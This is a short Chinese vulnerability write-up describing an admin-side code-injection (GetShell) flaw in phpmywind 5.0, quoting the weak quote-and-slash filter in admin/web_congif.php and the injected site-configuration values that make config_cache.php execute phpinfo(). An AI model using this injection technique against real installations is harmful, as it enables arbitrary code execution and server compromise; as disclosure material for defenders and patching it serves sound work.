phpmywind 5.0 后台GetShell漏洞

摘要

admin/web_congif.php 的过滤代码如下。[php]//强制去掉 '//强制去掉最后一位 /$vartmp = str_replace("'",'',$row['varvalue']);

漏洞作者： 蓝蓝

admin/web_congif.php 的过滤代码如下。

[php]

//强制去掉 '

//强制去掉最后一位 /

$vartmp = str_replace("'",'',$row['varvalue']);

 

if(substr($vartmp, -1) == '//')

{

$vartmp = substr($vartmp,1,-1);

}

[/php]

只过滤了最后一位的反斜杠，只需要加两个反斜杠就可以了·····

首先修改网站配置信息

 

 

config_cache.php中会变成这样

[php]

$cfg_webname = '的网站/';

$cfg_weburl = ';/*http://127.0.0.1';

$cfg_webpath = '*/phpinfo();#';

$cfg_author = '';

[/php]

php代码就会被执行了。